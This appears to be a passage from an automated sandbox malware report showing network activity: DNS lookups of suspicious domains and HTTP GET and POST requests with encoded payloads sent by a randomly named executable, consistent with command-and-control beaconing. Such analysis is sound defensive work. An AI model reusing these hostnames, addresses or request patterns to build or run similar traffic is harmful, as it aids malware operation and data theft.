                                                          Jul 2, 2024 14:05:59.263947964 CEST4977280192.168.2.6188.114.97.3
                                                          Jul 2, 2024 14:05:59.270178080 CEST8049772188.114.97.3192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 2, 2024 14:02:53.810754061 CEST6063653192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:02:54.714447021 CEST53606361.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:03:10.740829945 CEST6533953192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:03:10.751724005 CEST53653391.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:03:18.818510056 CEST5431853192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:03:18.849287033 CEST53543181.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:03:31.959697008 CEST6418853192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:03:32.143774033 CEST53641881.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:03:45.381931067 CEST6358953192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:03:46.193293095 CEST53635891.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:03:59.633491039 CEST5545153192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:03:59.650907040 CEST53554511.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:04:12.757234097 CEST5527453192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:04:12.779609919 CEST53552741.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:04:25.912734032 CEST6254453192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:04:25.938954115 CEST53625441.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:04:39.070029974 CEST6193353192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:04:40.083067894 CEST6193353192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:04:40.419280052 CEST53619331.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:04:40.419321060 CEST53619331.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:04:53.695060015 CEST5545953192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:04:53.712872028 CEST53554591.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:05:06.838294029 CEST5375953192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:05:07.135642052 CEST53537591.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:05:20.600732088 CEST6483953192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:05:20.681009054 CEST53648391.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:05:34.333985090 CEST6435353192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:05:35.156428099 CEST53643531.1.1.1192.168.2.6
                                                          Jul 2, 2024 14:05:48.492985010 CEST6495853192.168.2.61.1.1.1
                                                          Jul 2, 2024 14:05:48.574402094 CEST53649581.1.1.1192.168.2.6

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jul 2, 2024 14:02:53.810754061 CEST192.168.2.61.1.1.10x62f7Standard query (0)www.jl884.vipA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:10.740829945 CEST192.168.2.61.1.1.10xcaacStandard query (0)www.cloudsoda.xyzA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:18.818510056 CEST192.168.2.61.1.1.10x1340Standard query (0)www.d99qtpkvavjj.xyzA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:31.959697008 CEST192.168.2.61.1.1.10xb145Standard query (0)www.firmshow.topA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:45.381931067 CEST192.168.2.61.1.1.10xe5fbStandard query (0)www.jl800.vipA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:59.633491039 CEST192.168.2.61.1.1.10x1aaeStandard query (0)www.theridleysuk.co.ukA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:12.757234097 CEST192.168.2.61.1.1.10x3937Standard query (0)www.dexiangovernment.orgA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:25.912734032 CEST192.168.2.61.1.1.10x3783Standard query (0)www.autonomyai.xyzA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:39.070029974 CEST192.168.2.61.1.1.10xbfaaStandard query (0)www.faxinguxn6.cnA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:40.083067894 CEST192.168.2.61.1.1.10xbfaaStandard query (0)www.faxinguxn6.cnA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:53.695060015 CEST192.168.2.61.1.1.10xd617Standard query (0)www.hereboy.co.ukA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:06.838294029 CEST192.168.2.61.1.1.10x56c3Standard query (0)www.rebornqababy.ruA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:20.600732088 CEST192.168.2.61.1.1.10x475Standard query (0)www.bulletinnest.comA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:34.333985090 CEST192.168.2.61.1.1.10x3f10Standard query (0)www.erosonline.com.brA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:48.492985010 CEST192.168.2.61.1.1.10xec4Standard query (0)www.cavetta.org.mtA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jul 2, 2024 14:02:54.714447021 CEST1.1.1.1192.168.2.60x62f7No error (0)www.jl884.vipe6375a47.jl884.vip.cname.scname.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:02:54.714447021 CEST1.1.1.1192.168.2.60x62f7No error (0)e6375a47.jl884.vip.cname.scname.com65.181.132.158A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:02:54.714447021 CEST1.1.1.1192.168.2.60x62f7No error (0)e6375a47.jl884.vip.cname.scname.com38.47.158.160A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:10.751724005 CEST1.1.1.1192.168.2.60xcaacName error (3)www.cloudsoda.xyznonenoneA (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)www.d99qtpkvavjj.xyzd99qtpkvavjj.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)d99qtpkvavjj.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)d99qtpkvavjj.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:32.143774033 CEST1.1.1.1192.168.2.60xb145No error (0)www.firmshow.top203.161.43.228A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)www.jl800.vip8418a72e.jl800.vip.cname.scname.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)8418a72e.jl800.vip.cname.scname.com38.47.158.215A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)8418a72e.jl800.vip.cname.scname.com65.181.132.188A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)www.theridleysuk.co.uktheridleysuk.co.ukCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)theridleysuk.co.uk3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)theridleysuk.co.uk15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)www.dexiangovernment.orgdexiangovernment.orgCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)dexiangovernment.org3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)dexiangovernment.org15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)www.autonomyai.xyzautonomyai.xyzCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)autonomyai.xyz15.197.142.173A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)autonomyai.xyz3.33.152.147A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:40.419280052 CEST1.1.1.1192.168.2.60xbfaaNo error (0)www.faxinguxn6.cn108.186.253.49A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:40.419321060 CEST1.1.1.1192.168.2.60xbfaaNo error (0)www.faxinguxn6.cn108.186.253.49A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)www.hereboy.co.ukhereboy.co.ukCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:07.135642052 CEST1.1.1.1192.168.2.60x56c3No error (0)www.rebornqababy.ru87.236.19.243A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)www.bulletinnest.combulletinnest.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)bulletinnest.com135.181.212.206A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)www.erosonline.com.brweb1163.kinghost.netCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)web1163.kinghost.net191.6.208.133A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.97.3A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.96.3A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • www.jl884.vip
                                                          • www.d99qtpkvavjj.xyz
                                                          • www.firmshow.top
                                                          • www.jl800.vip
                                                          • www.theridleysuk.co.uk
                                                          • www.dexiangovernment.org
                                                          • www.autonomyai.xyz
                                                          • www.faxinguxn6.cn
                                                          • www.hereboy.co.uk
                                                          • www.rebornqababy.ru
                                                          • www.bulletinnest.com
                                                          • www.erosonline.com.br
                                                          • www.cavetta.org.mt

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64971965.181.132.15880280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:02:54.728878021 CEST479OUTGET /r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.jl884.vip
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:02:55.701474905 CEST778INHTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:02:55 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=f069c706-b7c4-4a32c8a212c298de53e6180968e429573b0b; Expires=1719928975; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199217754847895e0098e04bbfd507822c5cf4a54418d67f04fe;path=/;HttpOnly;Max-Age=1800
                                                          jckl: v1QTA/ISyC2vPuJ130ArugFeZMlQ4JvMX/+JLNkJ46w+2KdcRncfulR1Bv3Iy3/WIW1ETD+BPM5uhk0k3hN7Hg==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: f348ea4096987dd5a229f7ccb11ab2ca
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.6497213.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:18.858448982 CEST758OUTPOST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 6a 69 4b 51 66 70 77 2f 35 30 62 70 69 43 69 6a 59 37 5a 43 33 39 44 59 46 76 55 44 77 4c 4a 50 37 4a 64 4b 77 4a 71 70 4f 70 50 77 59 64 71 67 32 62 52 57 53 36 54 5a 5a 48 4e 6d 48 48 74 70 4a 67 4e 44 79 77 5a 36 34 4b 57 53 54 66 66 6e 4e 35 53 49 32 61 6d 67 57 59 67 66 46 69 4f 48 34 66 6b 67 44 52 50 76 73 74 68 38 55 69 4b 71 6b 69 6d 56 33 36 32 46 4b 52 42 4f 65 48 58 79 46 59 53 63 62 45 6d 54 78 65 78 67 5a 75 6e 49 76 2f 43 4d 7a 6a 2f 73 42 68 58 72 36 6b 6b 72 36 34 42 30 48 47 67 4c 6f 47 76 52 4c 2b 72 54 7a 37 68 5a 57 39 68 7a 64 78 6f 7a 51 4b 65 46
                                                          Data Ascii: GBbljTO=C3FIcjbM8hgqjiKQfpw/50bpiCijY7ZC39DYFvUDwLJP7JdKwJqpOpPwYdqg2bRWS6TZZHNmHHtpJgNDywZ64KWSTffnN5SI2amgWYgfFiOH4fkgDRPvsth8UiKqkimV362FKRBOeHXyFYScbEmTxexgZunIv/CMzj/sBhXr6kkr64B0HGgLoGvRL+rTz7hZW9hzdxozQKeF


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.6497223.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:21.389283895 CEST782OUTPOST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 74 50 37 6f 74 4b 69 39 2b 70 4e 70 50 77 54 39 71 70 79 62 52 52 53 36 65 6d 5a 48 42 6d 48 48 35 70 4a 68 52 44 79 48 74 35 34 61 57 51 65 2f 66 68 4a 35 53 49 32 61 6d 67 57 59 45 78 46 69 57 48 34 72 59 67 45 45 6a 75 69 4e 68 2f 54 69 4b 71 32 53 6d 52 33 36 32 37 4b 52 78 6f 65 42 54 79 46 59 69 63 62 52 4b 51 71 75 78 75 64 75 6d 37 6d 64 47 47 35 41 6d 49 49 67 58 37 70 54 77 49 32 75 41 75 62 31 67 6f 36 57 50 54 4c 38 7a 68 7a 62 68 7a 55 39 5a 7a 50 6d 6b 55 66 2b 37 6d 66 56 6f 50 58 4d 35 74 4c 4a 6d 59 61 63 4a 76 55 39 46 72 70 51 3d 3d
                                                          Data Ascii: GBbljTO=C3FIcjbM8hgqxyWQdKY//UbqsiijK7ZO39/YFq4TlotP7otKi9+pNpPwT9qpybRRS6emZHBmHH5pJhRDyHt54aWQe/fhJ5SI2amgWYExFiWH4rYgEEjuiNh/TiKq2SmR3627KRxoeBTyFYicbRKQquxudum7mdGG5AmIIgX7pTwI2uAub1go6WPTL8zhzbhzU9ZzPmkUf+7mfVoPXM5tLJmYacJvU9FrpQ==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.6497233.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:23.920151949 CEST1795OUTPOST /r4rr/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.d99qtpkvavjj.xyz
                                                          Origin: http://www.d99qtpkvavjj.xyz
                                                          Referer: http://www.d99qtpkvavjj.xyz/r4rr/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 43 33 46 49 63 6a 62 4d 38 68 67 71 78 79 57 51 64 4b 59 2f 2f 55 62 71 73 69 69 6a 4b 37 5a 4f 33 39 2f 59 46 71 34 54 6c 6f 6c 50 38 61 6c 4b 7a 73 2b 70 4d 70 50 77 4e 4e 71 6b 79 62 51 55 53 36 48 76 5a 48 63 62 48 46 42 70 4a 44 31 44 30 79 42 35 7a 61 57 51 42 76 66 67 4e 35 53 64 32 61 32 38 57 59 30 78 46 69 57 48 34 71 49 67 58 78 50 75 67 4e 68 38 55 69 4b 63 6b 69 6e 32 33 36 4f 4e 4b 51 46 6e 65 53 62 79 4c 63 47 63 59 6a 79 51 33 65 78 73 51 4f 6d 6a 6d 63 37 63 35 44 43 71 49 67 6a 56 70 55 59 49 30 5a 6c 46 50 33 63 77 76 57 44 71 49 72 44 58 33 65 68 36 5a 63 31 78 50 6e 51 4a 58 4e 2f 53 59 56 34 34 64 39 41 4d 49 62 71 78 51 59 63 6c 5a 74 49 4f 79 49 79 4c 30 67 67 48 36 2f 6b 4e 59 74 63 63 4d 2f 70 41 74 6b 49 43 51 65 67 67 6f 75 37 4f 57 53 47 32 32 31 32 72 54 65 69 56 72 56 64 45 37 43 52 54 43 68 53 33 31 76 45 6a 79 4b 73 35 45 39 7a 73 44 51 4e 64 6b 77 4d 4e 6f 51 54 41 4d 78 75 6c 61 52 53 46 79 4d 76 43 6b 33 71 6e 39 6c 41 64 32 67 2f 4e 62 7a [TRUNCATED]
                                                          Data Ascii: GBbljTO=C3FIcjbM8hgqxyWQdKY//UbqsiijK7ZO39/YFq4TlolP8alKzs+pMpPwNNqkybQUS6HvZHcbHFBpJD1D0yB5zaWQBvfgN5Sd2a28WY0xFiWH4qIgXxPugNh8UiKckin236ONKQFneSbyLcGcYjyQ3exsQOmjmc7c5DCqIgjVpUYI0ZlFP3cwvWDqIrDX3eh6Zc1xPnQJXN/SYV44d9AMIbqxQYclZtIOyIyL0ggH6/kNYtccM/pAtkICQeggou7OWSG2212rTeiVrVdE7CRTChS31vEjyKs5E9zsDQNdkwMNoQTAMxulaRSFyMvCk3qn9lAd2g/NbznMz8RWff/tjk6ipIROBqKXBlrHeDegJilZJ6hFzQ0ThGWAeWwWWtj+stOh0SBdfNgk6jhS8FcyWWsAsM5Q3wqI8qfXFa3QwaEk/jriK1TRKsQyHhMnjnGd9GrTvQCi8zQyFNRXIKzJiRfF5PMv7mnZtjyDJojTCS6C6bs8V8PTgBDWck0GrAA3MxhLy/iU+hNoJqA4kOqL3zNSxcukyuKLHlw+pU+YhmWYN/C84JQKpu7MQdxqKDJiXxcbnhFKPueH7Iu1v20m1e1CxbUz5dZbuCCt7lW45yZw8EaAAqT077nkZZBc2utcL1Gepoy2Nhnv7YePLZo+kzE4xSvwMUZLzRY5d/Y0cIRrDpbA9OxAve7aHGDMi3F9MkiQGnOLJpoE6Y/k8bOQozTIN5PflNAWoj4CV44h0kAioG7uspUFa1O5OVhumSF7JRL1TEU3lSlXZ575m9jZ7Uz3OWUrWKbi10zzkq01yRh6MP/VfY/HnPMmSPtUusHcQMOFX2mQgsFCNZUV6N0mqpP0f8xDMFkbHrxqw9Qv2l/cHSOoOQX3vPcFKQHwmmlAsIk0VKw19DZZVT6ZdCMBNfph1R0zr6FcxnHoznRH8WvMdJu0QC9knT6wz6QeESWPGCMymABV0KRs2Xk4e+luyn7tFNonxLkDac9BT/S0bVD5 [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.6497243.33.130.19080280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:26.452953100 CEST486OUTGET /r4rr/?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.d99qtpkvavjj.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:03:26.939934969 CEST408INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:03:26 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 42 3d 72 4c 34 6c 50 26 47 42 62 6c 6a 54 4f 3d 50 31 74 6f 66 56 58 74 79 31 34 30 78 42 53 56 50 70 49 57 37 67 79 69 72 56 76 62 62 71 34 5a 6d 74 76 52 4d 66 51 33 76 49 4e 70 39 37 55 2b 6a 50 65 4b 4f 70 62 4e 66 2f 7a 68 78 70 42 65 55 59 54 61 46 31 63 62 59 31 64 79 4a 77 4a 55 7a 68 6c 6a 6c 71 44 44 57 34 48 44 48 59 62 4c 79 5a 71 77 47 6f 67 33 50 51 47 53 67 59 59 4f 53 57 79 47 6f 38 31 4b 62 53 57 72 6b 67 79 72 78 36 36 4e 4c 56 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mB=rL4lP&GBbljTO=P1tofVXty140xBSVPpIW7gyirVvbbq4ZmtvRMfQ3vINp97U+jPeKOpbNf/zhxpBeUYTaF1cbY1dyJwJUzhljlqDDW4HDHYbLyZqwGog3PQGSgYYOSWyGo81KbSWrkgyrx66NLVM="}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.649727203.161.43.22880280C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 2, 2024 14:03:32.153460026 CEST746OUTPOST /02nb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.firmshow.top
                                                          Origin: http://www.firmshow.top
                                                          Referer: http://www.firmshow.top/02nb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 39 43 6b 55 33 6b 66 74 69 34 48 32 34 52 75 38 64 6e 31 4e 2b 44 46 7a 47 4a 53 35 52 30 2b 4c 56 39 46 6f 33 74 6b 6e 51 37 39 61 44 34 35 72 61 45 4a 65 6f 4f 64 4e 6b 6c 6a 33 4d 6d 33 67 74 43 73 58 61 63 64 75 57 2b 49 30 63 55 36 33 45 73 2f 2f 46 4f 77 6e 63 4d 4f 74 31 66 4d 30 50 69 45 76 53 65 2f 6e 55 67 59 58 31 71 54 41 6e 46 66 31 43 31 38 79 4d 5a 53 75 61 32 70 44 31 38 41 48 4e 78 4a 4b 43 41 72 77 63 59 54 38 6b 7a 58 41 33 53 6e 2b 63 68 46 2b 50 47 70 43 75 4c 79 36 74 32 52 59 77 49 31 43 68 6b 32 38 58 51 61 7a 62 4b 73 43 64 6f 44 71 55 56 6a 7a 39 57 4c 65 54 30 72 66 77 49 31 65
                                                          Data Ascii: GBbljTO=9CkU3kfti4H24Ru8dn1N+DFzGJS5R0+LV9Fo3tknQ79aD45raEJeoOdNklj3Mm3gtCsXacduW+I0cU63Es//FOwncMOt1fM0PiEvSe/nUgYX1qTAnFf1C18yMZSua2pD18AHNxJKCArwcYT8kzXA3Sn+chF+PGpCuLy6t2RYwI1Chk28XQazbKsCdoDqUVjz9WLeT0rfwI1e
                                                          Jul 2, 2024 14:03:32.854695082 CEST658INHTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:03:32 GMT
                                                          Server: Apache
                                                          Content-Length: 514
                                                          Connection: close
                                                          Content-Type: text/html
